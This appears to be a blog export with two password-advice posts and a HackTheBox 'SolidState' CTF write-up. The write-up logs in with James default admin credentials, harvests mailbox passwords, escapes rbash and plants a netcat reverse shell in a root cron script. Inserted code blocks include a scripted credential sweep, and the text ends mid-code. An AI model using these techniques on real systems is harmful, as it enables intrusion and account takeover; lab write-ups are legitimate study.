to your security. If someone (including you) wants to log in to an account on a new device, the service generates a confirmation code that only lasts a few minutes and that only you will have access to. 
Either way, you will know if someone is trying to log on to your account from a device that you haven\u0026rsquo;t used with it before.\nGo to https://www.turnon2fa.com/ and follow the instructions for all the platforms you wish.\nYou might wish to change all your passwords to more unique, secure ones. I wouldn\u0026rsquo;t necessarily call that a small step, however. But if you have been reusing passwords across different accounts, CHANGE THEM ALL.\nProperties of A Good Password - The Short Version # If you\u0026rsquo;d like to see the longer version of how to create a good password, check out the post containing data from the Probable Wordlists: \u0026ldquo;Actionable Password Advice Based on the Probable Wordlists\u0026rdquo; (31 January 2018), which covers why unique passwords matter, what makes them vulnerable to attack, and how to create strong yet memorable ones.\nPassword Length Is Most Important # The common minimum for password length is 8 characters; I recommend a minimum length of 12. One way to break passwords is brute force: there are a lot of character combinations, and the attacker simply tries each one. Depending on length, this can take a very small or an ASTRONOMICALLY ENORMOUS period of time. Every extra character multiplies the number of combinations by the size of the character set, which is why length beats cleverness. The time it would take an average computer to try all combinations of 16 letters and numbers is on the order of 44 million years.\nCharacter Diversity # The majority of passwords in leak files today use only letters and numbers. Buck this trend to make your password far less likely to be brute forced. By the same estimate, the time it would take an average 2018 computer to generate all combinations of 16 letters, numbers and symbols is about 9 times the current age of the universe.\nPasswords Should NEVER Contain Biographical Information Or Anything Easily Found Online # Never include the name of your hometown, high school, pets, etc. in your passwords.\nWhy would a cracker brute force from all possibilities when instead they could harvest common biographical information? 
My BEWGor script can generate millions of passwords based on this easily found information. If it can generate that password based on your dog\u0026rsquo;s name and the house number of your childhood home, so can anyone else.\nMore Password/Identity Security Measures # Beware of Scams! # Scams to steal your information run rampant. You don\u0026rsquo;t need to be an idiot to fall for them, either. These scams are specially designed to fool people, and they work.\nReal tech support does not send unsolicited emails or other communications that say you need to change your password and must \u0026ldquo;click here\u0026rdquo; to do so. If you are asked to do this, someone is trying to scam you.\nIf IT or some other qualified entity needs access to your accounts, be careful:\nMake sure they are who they say they are. Phone numbers can be spoofed and someone might drop your boss\u0026rsquo; name, so verify through a channel you already trust: ask your manager, call the help desk at its published number, etc. This alone defeats many scams.\nIf possible, set a temporary password for the duration of the time access is needed. When done, change it to something new.\nCheck For Leaks # Passwords are leaked at an alarming rate. Every day, thousands (if not tens, or hundreds of thousands) of credentials are published online. The odds are that one day, this will happen to you. It might not be due to any fault of yours, but it will happen. Run your email addresses through Hacked-Emails every once in a while to see if your address appears. There is some nuance to your address showing up on a list, however.\nHacked-Emails will show email dumps, even if they aren\u0026rsquo;t paired with passwords. Your email address may already be public information. You might freely distribute it on your business card or website. 
While you might get an increase in spam, or phishing attempts, your email address being well known usually isn\u0026rsquo;t the end of the world.\nInstead of being paired with plaintext passwords, the emails may be paired with password hashes. A hash isn\u0026rsquo;t encryption that can be undone; the attacker has to guess candidates and hash each one, so while no hash is uncrackable, your long, complicated password may stand up to even the most advanced hash cracking attempts.\nEven if your password is published in plaintext, it might not be the password to your email itself. You might have used your email address as a username at a website, and the password given belongs only to that website. This is why you aren\u0026rsquo;t reusing passwords.\nChange Your Passwords Regularly, But Not TOO Regularly # It\u0026rsquo;s no longer considered good advice to tell people to change their passwords every few months. In practice, this has led to pseudo-reuse. \u0026ldquo;I\u0026rsquo;m not going to be able to remember a completely different password! I\u0026rsquo;ll just add a number one at the end of my old one.\u0026rdquo;\nIt still is wise to change your passwords once in a while, however. If somehow someone has compromised your full credentials, they might not make this information public. If they dump the information or sell it online, the likelihood that you will be notified of the breach goes up. They might have put a lot of time and effort into cracking a list of credentials that includes yours, and a change of the credentials might render that effort useless.\nUse A Password Manager # If you want to go to the next level and have your passwords remembered for you while still being secure, there are password managers. They also reduce your exposure to keystroke-capturing software and to phishing (tricking you into typing a real password into a fake website), because a manager fills a saved password only on the site it was saved for, and you never type it. Many managers offer two-factor authentication, password report cards, password age monitoring and secure password generation. 
Their use is recommended by Information Security professionals around the world.\nThanks for reading!\n","date":"8 February 2018","externalUrl":null,"permalink":"/blog/password-advice-for-everyone/","section":"Blogs","summary":"Essential steps to secure your accounts: use unique passwords, enable 2FA, and avoid common password mistakes.","title":"Password Advice for Everyone","type":"blog"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nOverview # This document will show why you need a unique, secure password. It then will describe what the least unique passwords have in common, and why they are catnip for password cracking software. Finally, I\u0026rsquo;ll show you how to create a more unique password that bucks the trends while still being memorable.\nIn order to get a better idea of the trends of secure and insecure passwords, I ran a portion of my Probable Wordlists through DigiNinja\u0026rsquo;s Pipal analysis tool.\nIf you\u0026rsquo;d like to get right to the findings, scroll right to the Results section.\nCaveat: Following this guide will make it harder for an attacker to compromise your password via brute force. However, there may be no way to become 100% secure. A person dedicated to determining a password has many tricks at their disposal. Sophisticated threat actors will use a combination of methodologies in this process. A password that is extremely resistant to brute forcing may still be stolen via social engineering or malware. Always exercise caution.\nBackground # What Can A Password List Tell Me? # A giant list of passwords sounds useful, but what can I do with it?\nYou could search through it for your passwords. If they\u0026rsquo;re found, you rush to change them. 
If they aren\u0026rsquo;t, you think \u0026ldquo;Phew, that\u0026rsquo;s a relief.\u0026rdquo; In both cases, you are likely to simply move on and stop thinking about password security.\nYou might share the list with a few friends, or you might revisit the list the next time you come up with a new password, but it\u0026rsquo;s entirely possible that you don\u0026rsquo;t continue to give your passwords much thought. We have a lot to worry about, and not spending days worrying about password security is hardly a personal failure.\nIt\u0026rsquo;s possible that the only times you think about how secure or unique your passwords are, or even consider password security as a whole, are when you hear about leaks. A headline will appear talking about how a record-breaking breach resulted in passwords blasted all over the internet. Experts appear and tell us that foreign governments and gangs are after our information and that the sky is falling. You might get concerned for an afternoon, but what else can be done? We know that identity theft happens, but that\u0026rsquo;s what the protections at our banks are for - right? They\u0026rsquo;ve got it all under control, of course! Surely, the sky isn\u0026rsquo;t really falling - why not leave this problem to \u0026ldquo;the cybersecurity people?\u0026rdquo;\nThe truth of the matter is that \u0026ldquo;the cybersecurity people\u0026rdquo; are working hard to make the internet a safer place. Security is a complex problem, however, and everyone can play a role. User participation in cybersecurity measures need not be intense or even difficult. We can find parallels in other aspects of our lives. Allow me to create an overly dramatic analogy.\nA Quick Trip To The Gym Ends With Shame On Your Family # Consider a gym locker. For this analogy, our locker is a simple box with a loop to thread your lock into. It doesn\u0026rsquo;t have a built in combination dial or key you pick up from the front desk. 
After doing your research, you\u0026rsquo;ve purchased a brand new, top-of-the-line combination lock. It really is a marvel of modern locksmithing. There is no such thing as an impenetrable lock, but this one is pretty close. You have reinforced titanium parts that can\u0026rsquo;t be cut without industrial-strength equipment, a bulletproof mechanism that can\u0026rsquo;t be defeated without hours of tedious work, and plenty of other, easier targets organized into neat rows nearby. Your lock seems pretty secure, and you feel comfortable that the solid-gold pocketwatch you promised your grandfather on his deathbed to never leave at home is going to be there when you finish your workout.\nWhat would your kind, wise, old grandfather think if he found out someone had managed to get through this carefully crafted security system, seizing the priceless family heirloom because his grandchild had used a combination of 1234?\nHere, the \u0026ldquo;security people\u0026rdquo; are locksmiths. They did everything they could to create a secure system for you to protect your belongings. Measures had been taken against picks, shims, jimmying, prying, hammers, and scores of other methods of defeating their security system, only for all of them to be rendered useless by an owner who didn\u0026rsquo;t want to take an extra moment to come up with an uncommon combination. An owner who now, after returning to an empty locker, needs to walk home in the rain without their jacket, pray someone is at home to open the door for them, and then prepare to call grandma and tell her that a piece of the family\u0026rsquo;s soul is probably sitting in a pawn shop window.\nActionable, Data-Supported Advice # I did say the analogy was going to be overly dramatic, but I hope the implications are clear. The best security systems can be defeated if the user is careless. You don\u0026rsquo;t have to become a certified cybersecurity expert, but small changes can make a huge difference. 
If you use the right password generation techniques, it will be astronomically harder for anyone to brute force your password.\nArmed with DigiNinja\u0026rsquo;s Pipal, I performed an analysis on the list of the Top 32 Million Most Common Passwords. This isn\u0026rsquo;t the largest list in the repository, but it is sizable enough to encompass notable trends. Pipal provided valuable data to interpret and chart. These findings provide actionable, data-supported information that is useful to everyone, even if your passwords weren\u0026rsquo;t on the list.\nPasswords included in this analysis appeared at least 10 times in the Probable Wordlists Rev 1.2 files.\nResults # Advice based on the data from each analysis is included on the charts themselves.\nThe Power of Hashcat and Other Cracking Tools # No password is uncrackable. Modern password cracking tools are very powerful. However, a password that is strong, unique and bucks common trends will be the hardest to guess via mask (brute force) and dictionary attacks.\nThe logic here is simple: if your password isn\u0026rsquo;t on an attacker\u0026rsquo;s wordlist, it cannot be guessed via dictionary attack. If your password doesn\u0026rsquo;t match the common patterns, it will take a brute force attack much longer to guess it.\nLet\u0026rsquo;s look at an example: password17 If a password cracker is brute forcing passwords using a pattern of eight lowercase letters followed by 2 digits (in Hashcat mask syntax, ?l?l?l?l?l?l?l?l?d?d, a keyspace of 26^8 x 10^2, roughly 2 x 10^13 candidates), then our password is going to be guessed. A simple brute force attack starts at aaaaaaaa00 and covers all possibilities until it gets to zzzzzzzz99. Along the way, it will land on password17. This might not happen quickly, but it will happen.\nSoftware like Hashcat has the ability to use hybrid attacks that combine a dictionary and a brute force mask. If this dictionary plus mask attack was using a list of the most common passwords and appending a 2 digit number on to the end, then password17 doesn\u0026rsquo;t stand a chance! 
At the number 2 most common password, it would take just 118 guesses (all 100 two-digit suffixes on the No. 1 most common password, then password00 through password17) to hit the bull\u0026rsquo;s eye. Keep in mind that this does not mean a cracker is manually typing in password00, password01, password02, until they get a hit. An algorithm, often accelerated by a GPU, performs this process in milliseconds.\nThe dictionary word plus numbers format is very common, and guessing password candidates that match this pattern may be one of the first strategies a cracker might employ. The ability to append numbers at the end of words is included in the Hashcat default \u0026ldquo;rule\u0026rdquo; set. Rules create mutations of wordlist items that are used in a dictionary attack, and will create candidates based on strategies like swapping every letter s for a $ and other common substitutions.\nThis mutation functionality can make passwords that appear secure because of their character choice and character order easy to guess. password can be mutated into something like P@$$w0rd - which some password \u0026ldquo;strength\u0026rdquo; algorithms might rate as strong. It\u0026rsquo;s got capital and lowercase letters, special characters and numbers! How could it not be secure?! Well, easily.\nThe l33tspeak phenomenon has been around for some time now, and it doesn\u0026rsquo;t take a Nobel Prize winner to guess that s can be swapped for $. Theoretically, almost @ny $3nt3nc3 c@n b3 \\/\\/r1tt3n 1n 1337 and still be legible. If you can read that, then you can figure out how to write a rule to create mutations yourself. 
(If you couldn\u0026rsquo;t read it, the l33t section reads \u0026ldquo;any sentence can be written in leet\u0026rdquo;)\nMutations of dictionary words and other common passwords are easy to guess, and shouldn\u0026rsquo;t form your entire password.\nMake Your Password Buck the Trends With These Tips: # Let\u0026rsquo;s walk through the process of taking a weak password, based on a dictionary word, and altering it based on the advice drawn from the data in this analysis. When we are done, it will be statistically much harder to guess. However, don\u0026rsquo;t use our final product as your password! It is published online, right here!\nStarting password: noodle\nAbout 90% of passwords used solely lowercase letters and numbers. 47% used lowercase letters alone. Adding digits only gets us as far as: noodle17\nSpecial characters appeared in fewer than 4% of the passwords. Uppercase letters appeared in fewer than 1%! 35% of passwords solely used letters followed by numbers. Use special characters and capital letters! Hit that shift key: Noodle-17\nJust 0.02% of passwords on the list began with a special character. Character order matters! Lead with one: -Noodle-17\nMore than 91% of passwords had lengths between 8 and 14 characters. 23% of the passwords used exactly 8 characters. About 40% of passwords ended in a number. Make 13 or 14 your minimum password length and you\u0026rsquo;ll be like the rare 9%. Pad your password with special characters and relevant words using capital letters to make it longer and even harder to guess: -Noodle-17-SOUP-\nThe most \u0026ldquo;natural\u0026rdquo; way to include a capital letter is to capitalize the first letter of the dictionary word. Don\u0026rsquo;t let that be your only capital! If it\u0026rsquo;s natural for you, it would be natural for the crackers as well. We started with noodle, and ended up with -Noodle-17-SOUP-, which includes lowercase letters, numbers, capital letters (and not only at the beginning) and \u0026ldquo;friendly\u0026rdquo; special characters. 
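To make the numbers above concrete, here is an added example (my own code, not part of the original post and not Hashcat's code) that implements a small subset of Hashcat's rule syntax, reproduces the dictionary-plus-mask guess count for password17, and computes mask keyspaces and exhaustion times. The wordlist, the guess rate and the supported rule functions are constructed for illustration; real Hashcat rule files support far more functions, and Hashcat does not walk a mask in plain alphabetical order. It also generalises the noodle walk-through: the same ?d?d hybrid attack never produces -Noodle-17-SOUP-.

```python
"""Added example (not from the original post, and not Hashcat's own code):
a toy subset of Hashcat's rule language, a dictionary-plus-mask hybrid
counter, and mask keyspace arithmetic. The wordlist and guess rate below
are constructed for illustration."""
import itertools
import string

MASK_SETS = {"l": string.ascii_lowercase, "u": string.ascii_uppercase,
             "d": string.digits, "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"}


def apply_rule(word: str, rule: str) -> str:
    """Apply one rule line (functions separated by spaces). Supported subset:
    ':' no-op, 'l' lower, 'u' upper, 'c' capitalize, 'r' reverse,
    '$X' append X, '^X' prepend X, 'sXY' replace every X with Y."""
    for fn in rule.split():
        op, arg = fn[0], fn[1:]
        if op == ":":
            pass
        elif op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
        elif op == "r":
            word = word[::-1]
        elif op == "$":
            word = word + arg
        elif op == "^":
            word = arg + word
        elif op == "s":
            word = word.replace(arg[0], arg[1])
        else:
            raise ValueError(f"unsupported rule function {fn!r}")
    return word


def mask_charsets(mask: str) -> list:
    """'?d?d' -> [digits, digits]; a literal character is a one-item set."""
    sets, i = [], 0
    while i < len(mask):
        if mask[i] == "?":
            sets.append(MASK_SETS[mask[i + 1]])
            i += 2
        else:
            sets.append(mask[i])
            i += 1
    return sets


def mask_keyspace(mask: str) -> int:
    size = 1
    for charset in mask_charsets(mask):
        size *= len(charset)
    return size


def hybrid_candidates(words, mask: str):
    """Dictionary + mask (hashcat -a 6): every suffix for word 1, then word 2..."""
    sets = mask_charsets(mask)
    for word in words:
        for tail in itertools.product(*sets):
            yield word + "".join(tail)


def guess_number(target: str, candidates) -> int:
    """1-based position of target in the candidate stream, 0 if never produced."""
    for n, candidate in enumerate(candidates, 1):
        if candidate == target:
            return n
    return 0


def years_to_exhaust(keyspace: int, guesses_per_second: float) -> float:
    return keyspace / guesses_per_second / (365.25 * 24 * 3600)


# Constructed stand-in for the top of a leaked-password list.
TOP_WORDS = ["123456", "password", "12345678", "qwerty"]

if __name__ == "__main__":
    print(apply_rule("password", "c sa@ ss$ so0"))                            # P@$$w0rd
    print(guess_number("password17", hybrid_candidates(TOP_WORDS, "?d?d")))   # 118
    print(guess_number("-Noodle-17-SOUP-", hybrid_candidates(TOP_WORDS, "?d?d")))  # 0
    print(mask_keyspace("?l?l?l?l?l?l?l?l?d?d"))                               # 20882706457600
    print(f"{years_to_exhaust(62 ** 16, 1e9):.1e} years for 16 alphanumerics at 1e9/s")
```

The rate argument is the part to be honest about: a billion guesses per second is plausible for a fast unsalted hash on one GPU and wildly optimistic for bcrypt, so the same keyspace can mean minutes or millennia depending on how the site stored the password.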
Not all systems allow for things like spaces, stars, and ampersands to be part of a password. This results in the very infrequent use of these characters in passwords. This is due to the handling of the password systems themselves, which might use some special characters for control.\n-Noodle-17-SOUP- is much harder to crack than noodle, and is even harder to crack than n00dl3$0UP, which a rule set can mutate out of dictionary words.\nThanks for reading!\n","date":"31 January 2018","externalUrl":null,"permalink":"/blog/actionable-password-advice-based-on-the-probable-wordlists/","section":"Blogs","summary":"Why unique passwords matter, what makes them vulnerable to attack, and how to create strong yet memorable ones - based on the Probable Wordlists v2","title":"Actionable Password Advice Based on the Probable Wordlists","type":"blog"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # From a bird\u0026rsquo;s eye view, SolidState is a beginner’s CTF.\nHowever, if you are able to solve it, you are well on your way to the more intermediate level CTFs. This box requires actual enumeration, exploit research and investigation, and prior knowledge. It is a great test of your ability to understand what exactly you should be looking for while enumerating. It’s a fun one.\nThere is a key concept that you will have to know about ahead of time. The box does not offer much in the way of a hint in its direction.\nI was able to solve it by browsing through Ben Clark’s Red Team Field Manual and researching enumeration and privilege escalation guides online.\nShoutout to g0tm1lk and mubix for excellent PrivEsc and Enumeration guides.\nThis write up assumes that the reader is using Kali, but any pentesting distro such as BlackArch will work. The tools come with a stock Kali installation, unless otherwise mentioned.\n1. 
Initial Scans # Before anything else, I added the IP to my /etc/hosts for convenience as solidstate.htb\nI began with my benmap.sh script, which runs nmap in stages.\nThe most important outputs came from an nmap command that was similar to\nnmap -F solidstate.htb Our scan finds the box is running:\nSSH at port 22\nSMTP at port 25\nHTTP at port 80\nPOP3 at port 110\nNNTP at port 119\nPorts 25, 110 and 119 all seemed to contain software named James, a solid place to begin investigating. However, I like to start with HTTP scans. I set those in motion before investigating James.\nnikto and dirsearch are must-runs when investigating HTTP.\nnikto -h http://solidstate.htb -o nikto_result.txt I like to do my web directory bruteforcing with dirsearch.\ndirsearch -u http://solidstate.htb -e php,txt,html,jpg,gif,htm,js,aspx --plain-text-report=dirsearch_quick_result I’ve included the results here, but I began digging at James before they had finished.\nJames is listening on the SMTP and POP3 ports, so it is probably some kind of mail server. Maybe findsploit has something interesting.\nfindsploit james That RCE script matches our James version. Why not just run it and see if we get RCE?\n\u0026ldquo;Payload will be executed when someone logs in.\u0026rdquo;\nWho is going to log in, though? Another HackTheBox user? I’d rather not wait for that.\nRCE usually entails some sort of powerful access. There has to be something we can dig out of the module itself.\n2. Enumerating James # If we look into the exploit code, we might be able to determine what gives the exploit its effectiveness and redirect it in some way.\nThe exploit script contains credentials! Both username and password are root - real top-notch security.\nJust for the hell of it, I tried ssh root@solidstate.htb with the password root. This didn’t work, unsurprisingly.\nThe exploit is attempting to connect to port 4555. 
Maybe we can do that ourselves using nc ?\nnc solidstate.htb 4555 Use root as both username and password when asked.\nhelp tells us about the ability to create a new user. Will our new user have access to the system in some way? Let’s see what happens.\nadduser frank beans quit Frank is here to cause trouble, but what can he do? Our nmap scan provides some guidance.\nSMTP is used to send emails. POP3 is used to read emails. NNTP is for Usenet, which I know nothing about. If we run out of ideas, we\u0026rsquo;ll come back to this. It’s pretty unlikely someone is going to be sending Frank any new emails. However, it is possible that James has some automated features in place to get our \u0026ldquo;new user\u0026rdquo; up to speed.\nWill Frank get an email containing a randomly generated SSH password? We better check his inbox at the POP3 port.\nnc telnet solidstate.htb 110 didn\u0026rsquo;t work. How can we connect to this port? I searched online for an answer.\nEventually, I found that POP3 can be communicated with over telnet. I had never used POP3 commands before, but a quick online search showed it wasn\u0026rsquo;t tough to operate.\ntelnet solidstate.htb 110 USER frank PASS beans LIST - this command shows information on messages for the current user No messages for Frank. The interface on port 4555 also allowed me to change the passwords for the other users. Maybe one of them has something interesting in their inbox?\nnc solidstate.htb 4555 listusers (This is detailed in the image below)\nWe see a username with bash_completion.d exists, I bet this was created by the exploit script we ran earlier. 
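The port 4555 and POP3 steps above can be scripted end to end instead of being typed into nc and telnet one mailbox at a time. What follows is an added example, not code from the original writeup: it logs in to the James Remote Manager, lists the users, resets each password, then reads every mailbox over POP3 and greps the bodies for credentials. The transport class replays a constructed session so the code runs offline; the user names echo the box, but the mail text and the password it contains are made up. Against a live host, swap ScriptedLines for an object with the same send() and readline() methods over socket.create_connection((host, port)).

```python
"""Added example, not code from the original writeup: the James Remote
Manager (TCP 4555) and POP3 (TCP 110) steps scripted end to end. The
ScriptedLines transport replays a constructed session so this runs offline;
the mail text and password in it are made up, not taken from the box."""
import re

CRED_RE = re.compile(r"username:\s*(\S+).*?pass(?:word)?:\s*(\S+)", re.I | re.S)


class ScriptedLines:
    """Offline stand-in for a socket: banner lines, then (expected command,
    reply lines) pairs. A live transport needs the same send()/readline()
    pair over socket.create_connection((host, port)), with readline()
    raising EOFError when the peer closes the connection."""
    def __init__(self, banner, script):
        self.queue, self.script = list(banner), list(script)

    def send(self, line):
        expected, replies = self.script.pop(0)
        if line != expected:
            raise AssertionError(f"sent {line!r}, script expected {expected!r}")
        self.queue += replies

    def readline(self):
        if not self.queue:
            raise EOFError("scripted session exhausted")
        return self.queue.pop(0)


def james_login(t, user="root", password="root"):
    """Banner is three lines ending 'Login id:'; a good login answers 'Welcome'."""
    for _ in range(3):
        t.readline()
    t.send(user)
    t.readline()                                   # 'Password:'
    t.send(password)
    return "Welcome" in t.readline()


def james_listusers(t):
    t.send("listusers")
    count = int(t.readline().split()[-1])          # 'Existing accounts N'
    return [t.readline().split("user: ", 1)[1] for _ in range(count)]


def james_setpassword(t, user, password):
    t.send(f"setpassword {user} {password}")
    return "reset" in t.readline()


def pop3_fetch_all(t, user, password):
    """Every message body in one mailbox, or None if the login is refused."""
    t.readline()                                   # '+OK' greeting
    t.send(f"USER {user}")
    t.readline()
    t.send(f"PASS {password}")
    if not t.readline().startswith("+OK"):
        return None
    t.send("LIST")
    t.readline()
    ids = []
    while (line := t.readline()) != ".":           # multi-line replies end with '.'
        ids.append(line.split()[0])
    messages = []
    for i in ids:
        t.send(f"RETR {i}")
        t.readline()
        body = []
        while (line := t.readline()) != ".":
            body.append(line[1:] if line.startswith("..") else line)  # undo dot-stuffing
        messages.append("\n".join(body))
    return messages


def find_credentials(text):
    return [(m.group(1), m.group(2)) for m in CRED_RE.finditer(text)]


def sweep(admin, pop3_for_user, new_password="beans"):
    """Reset every James user's password, then read each inbox over POP3."""
    if not james_login(admin):
        raise RuntimeError("James admin login failed")
    found = {}
    for user in james_listusers(admin):
        if james_setpassword(admin, user, new_password):
            for msg in pop3_fetch_all(pop3_for_user(user), user, new_password) or []:
                found.setdefault(user, []).extend(find_credentials(msg))
    return found


# Constructed session standing in for the box (not a real capture).
ADMIN_BANNER = ["JAMES Remote Administration Tool 2.3.2",
                "Please enter your login and password", "Login id:"]
ADMIN_SCRIPT = [
    ("root", ["Password:"]),
    ("root", ["Welcome root. HELP for a list of commands"]),
    ("listusers", ["Existing accounts 2", "user: james", "user: mindy"]),
    ("setpassword james beans", ["Password for james reset"]),
    ("setpassword mindy beans", ["Password for mindy reset"]),
]
MAIL_SCRIPTS = {
    "james": [("USER james", ["+OK"]), ("PASS beans", ["+OK"]),
              ("LIST", ["+OK 0 messages", "."])],
    "mindy": [("USER mindy", ["+OK"]), ("PASS beans", ["+OK"]),
              ("LIST", ["+OK 1 message", "1 90", "."]),
              ("RETR 1", ["+OK 90 octets", "Here are your ssh credentials:",
                          "username: mindy", "pass: Example-Pass-42!", "."])],
}


def demo():
    """Run the sweep against the scripted session."""
    return sweep(ScriptedLines(ADMIN_BANNER, ADMIN_SCRIPT),
                 lambda u: ScriptedLines(["+OK POP3 ready"], MAIL_SCRIPTS[u]))
```

Resetting every password is noisy and locks the real users out, which is acceptable on a CTF box and not on an engagement; the same sweep works unchanged if you already hold a password and skip james_setpassword.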
If there aren’t any interesting emails, we will look into that.\nUsing the setpassword command, we can set all passwords to beans.\nIt wasn\u0026rsquo;t very likely, but we should see if beans gets us SSH access to any of the accounts.\nIt didn\u0026rsquo;t.\nOh well, now we can use the same email-checking process we used for Frank, but for all the users.\nWe start with mailadmin and james - but quickly find that neither had any mail.\nSo, we move on to the other users, going down the list and checking inboxes. All but one turn up empty.\nMindy has two emails for us.\nRETR 1 Mindy is a new hire at SolidState security. Perhaps their IT system gives them some sort of changeme type of password at first? Worth a try. Let’s see what is behind email door #2, first.\nRETR 2 ...Here are your ssh credentials... username: mindy pass: P@55W0rd1!2@ How nice of them to communicate these in the CLEAR via email.\nPasswords in plaintext emails are not a great idea. After we exploit her credentials, maybe Mindy can get this organization to abandon this practice.\nssh mindy@solidstate.htb 3. Mindy\u0026rsquo;s Great Escape # As soon as we log in, we see that something is fishy here.\nLook at all this mess in the terminal, let\u0026rsquo;s clear it away.\nNo clear? That can\u0026rsquo;t be good. I hope I can grab the user flag, at least.\nUser flag captured!\nThe fact that we can\u0026rsquo;t use clear or most other commands is intolerable.\nI didn\u0026rsquo;t know what was causing such a limited shell, so I tried the usual command to gain a tty.\npython -c 'import pty; pty.spawn(\u0026quot;/bin/bash\u0026quot;)' Unfortunately, this didn\u0026rsquo;t do the trick.\nWhat other information do we have?\nWell, when I tried clear, the error message included the term rbash.\nWhat does rbash mean?\nI did a quick search online which led me to this SANS article. 
It was my understanding that as soon as we logged in with ssh, the system locked us into the restricted shell.\nBefore doing this box, I had done Bandit at overthewire.org. One of the levels was solved by running ssh with another command \u0026ldquo;attached.\u0026rdquo; This attached command would run faster than an automatic kick user command, allowing the user to maintain access.\nPerhaps that method could be deployed here?\nI tried to combine the idea of running a command in tandem with the ssh command with the ideas in the SANS paper. This is what I came up with:\nssh mindy@solidstate.htb vi Then, from within the vi text editor, running :!bash.\nWhy does this work? rbash itself does not forbid running a program that is on PATH and is named without a slash; what cripples the interactive session is the locked-down environment (notably PATH) that the login setup applies. A command handed to ssh is run by the login shell non-interactively, without that interactive login setup, so vi is found on the normal PATH and runs. Then, we can take advantage of vi\u0026rsquo;s ability to run shell commands from within the text editor to start a bash shell.\nWhile this did work, I ultimately found a more elegant method.\nssh mindy@solidstate.htb bash bash itself is run as a command, skipping the vi step. This shell still doesn\u0026rsquo;t have a tty, but that isn\u0026rsquo;t anything our Python command can\u0026rsquo;t fix.\npython -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;)' 4. Enumeration # Armed with a decent shell, it\u0026rsquo;s time to get some information about the system.\ncat /etc/*release* tells us we are dealing with Debian. Whether the simplest nc reverse shell works depends on which netcat is installed rather than on the distro: the -e option exists in netcat-traditional but not in the OpenBSD netcat that Ubuntu (and many Debian installs) ship by default, so check nc -h first. This box has one that supports it. I haven\u0026rsquo;t memorized any of the reverse shell commands yet, but nc local.machine.ip.addr PORT -e /bin/bash isn\u0026rsquo;t hard to remember.\nsudo -l is worth a shot, since we have Mindy\u0026rsquo;s password.\nUnfortunately, we find out that Mindy doesn\u0026rsquo;t have access to sudo. This might mean we have to exploit or RevShell our way to root.\nTo start enumeration, we do a quick ls in some commonly used directories like /home and /opt.\n/home came up empty at first glance, but /opt held promise. 
We know the system is running james - so maybe there are some useful configuration files.\nls /opt ls -la /opt One of these files is noteworthy: tmp.py. It is owned by root, but we have write permissions. I smell a PrivEsc!\ncd /opt cat tmp.py This script seems to just erase the contents of the /tmp folder. Is the root user expecting me to put something in there? If they didn\u0026rsquo;t want us to store things in /tmp/ I\u0026rsquo;m sure there is some other method that could prevent us from doing so. Even if we were prevented from writing to /tmp, we can put things in another directory like /dev/shm\nrm -r /tmp/* seems like the kind of command that would be run repeatedly, on a regular basis. If it was just going to be run once, the root user would just run the command. It\u0026rsquo;s likely that this script is run automatically, and likely periodically. Does root run it with a cronjob? As an unprivileged user we can\u0026rsquo;t read root\u0026rsquo;s own crontab, but /etc/crontab and the files in /etc/cron.d are world-readable and worth a look, and a root-owned, world-writable script sitting in /opt is a classic sign either way.\nRambling, Skippable Side Note # It wasn\u0026rsquo;t until I had already been attempting this box for some time that I learned about the existence of cronjobs. I had to come across the concept in my other attempts to familiarize myself with Linux. This underscores a need to understand the fundamentals of the OS. If you don\u0026rsquo;t understand the OS, it is a lot more difficult to exploit it.\nThe idea of cronjobs being important here is hinted at by the name. Solid-State implies no moving parts. Thematically, this concept is the opposite of this box, which runs a script without any user input.\nMy academic background included classes on circuit design, and the term Solid State got conflated with the concept of steady-state. This confusion ended up helping me put the pieces together. When introduced to time-dependent circuitry, such as LC circuits, problems often include an important phrase.\nAssume that at t=0, the circuit had been in steady-state for a long time.\nThis is meant to convey that the circuit had been unchanging until we began observing it. 
At this point, connections are made and any stored energy in capacitors or inductors begins to move around.\nMixing up Solid-State and Steady-State - I ended up stumbling upon the key concept.\n5. Waiting For the Root to Sprout # If the script is run as a cronjob, then we just need to add a line that starts a reverse shell. Since the script would be executed as root, the created shell would have root privileges.\nWe want to catch this shell as soon as the command is sent, so let\u0026rsquo;s set up our listener before altering the script.\nOn our local machine, we run:\nnc -lnvp PORTNUM\nNext, we need to edit the script to include our revshell command. But, before we do this, let\u0026rsquo;s make a copy of the original tmp.py - in case we bungle our editing process.\ncp /opt/tmp.py /dev/shm/copy.py\nI did not do this while editing, made a typo and ended up having to reset the box.\nWe can\u0026rsquo;t write the copy to /tmp, since that gets cleaned out by our script. We can\u0026rsquo;t write it to /opt, since we don\u0026rsquo;t have permission. /dev/shm is a good location. We have write access, and it is cleared upon reboot.\nThe original, unedited script contains a nice example of how to run bash commands from within python.\nimport os\nimport sys\n...\nos.system(\u0026#39;BASH COMMANDS\u0026#39;)\nWe can use this method with our own, shell-spawning bash commands. Append the command for the simple nc revshell onto tmp.py using echo and \u0026gt;\u0026gt;\necho \u0026quot;os.system('nc local.machine.ip.addr PORTNUM -e /bin/bash')\u0026quot; \u0026gt;\u0026gt; /opt/tmp.py\nMake sure your PORTNUM matches the listener. The appended line must start in column 0, and because Python runs a script top to bottom it executes after the cleanup the script already does; check with tail /opt/tmp.py that it landed on its own line rather than glued to the end of the previous one.\nWith the trap set, all we have to do is wait for the cronjob to run. If the process takes more than 5-10 minutes, you have done something wrong. 
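Here is an added Python example, not code from the box or from the original writeup, that automates the cron check described above: it parses system-style crontab text (the format of /etc/crontab and of the files in /etc/cron.d, which carry a user field), pulls the absolute paths out of each job that runs as root, and reports the ones the current user can write to. The crontab text embedded below is constructed for the example; the /opt/tmp.py entry and its three-minute schedule are assumptions, not something the box let us read. A job in the personal crontab of root (/var/spool/cron/crontabs/root) has no user field and is not readable by us, so this finds only the world-readable jobs.

```python
import os
import re

# Constructed crontab text in the /etc/crontab style (not read from the box): the usual
# SHELL/PATH lines, a comment, two scheduled jobs and one @reboot job. The /opt/tmp.py
# entry and its schedule are assumptions for the example.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/3 *   * * *   root    python /opt/tmp.py
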